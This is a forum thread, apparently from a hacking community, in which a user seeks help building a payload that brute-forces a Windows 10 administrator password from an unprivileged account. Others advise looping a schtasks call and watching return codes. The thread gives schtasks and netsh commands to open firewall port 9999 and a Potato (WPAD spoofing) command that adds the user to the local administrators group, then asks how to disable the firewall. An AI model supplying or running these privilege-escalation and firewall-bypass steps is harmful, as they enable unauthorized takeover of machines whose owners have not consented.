Jump to content

Brute forcing an admin account from payload? Windows 10


Recommended Posts

So I wanted to make payload which can be run without admin privileges brute force the admin password by call a program some program with system() that would require a password until the password is found.

My question is what is the fastest command you can run from Windows command line that will actually require administrator a password?

Also how do I get an error message back for conditional logic that will tell me if I got the right password?

Any Ideas?

Link to comment
Share on other sites

You'll be very limited in what apps you can use because you'll need to pick one that takes the password on the command line.

From that list, it shouldn't really matter what you pick as the first thing the app should do is check permissions so they will all fail at about the same speed.

Link to comment
Share on other sites

Digininja, any chance you can help me with syntax on this?

I think I'm going to just go ahead and brute scheduled task that will open a port on the firewall.

I'm not sure on syntax for schtasks and netsh advfirewall. Here's what I was trying for but my syntax is horribly wrong. Not really sure on the options.

schtasks /Create /S %computername% /U %username% /P password /TN portopen /SC %time% /tr netsh advfirewall firewall add rule name="Open Port 9999" dir=in action=allow protocol=TCP localport=9999


Edited by vailixi
Link to comment
Share on other sites

Or maybe something like this:
Keep getting syntax errors. I think I need escape characters but not really sure how to write out this command.

schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN portopen /TR "netsh advfirewall firewall add rule name=Open Port 9999 dir=in action=allow protocol=TCP localport=9999 /ST 18:44"


Edited by vailixi
Link to comment
Share on other sites

Too complicated, why not just do a dir or even a command that doesn't exist? Means you don't have to pass loads of arguments to the command you are calling.

And as a way to catch the password, put it in the comment but having said that I'm not sure if you can see other people's tasks so that might not any use. Just monitor the return code instead.

Link to comment
Share on other sites

OK, ok that makes sense. LOL.

I tried this:

schtasks /Create /S %computername% /RU desktop/8alleale\me /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30

Now I'm at least getting access denied instead of syntax error.
I tried this as well:

schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30

Same this way access denied. Is there something wrong with the way I'm getting the system and username?

Edited by vailixi
Link to comment
Share on other sites

Incidentally I found this wpad spoofing attack that seems to work rather well.

Potato attack

Potato source code on Github

Syntax was something like this:

Potato.exe -ip -disable_exhaust true cmd "C:\\windows\\system32\\cmd.exe /k net localgroup administrator me add"

This actually worked for adding my user to the administrators group. That's cool and all. I still don't have the password for netsh and open a port on the firewall though.

Is there a way to just kill the firewall?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...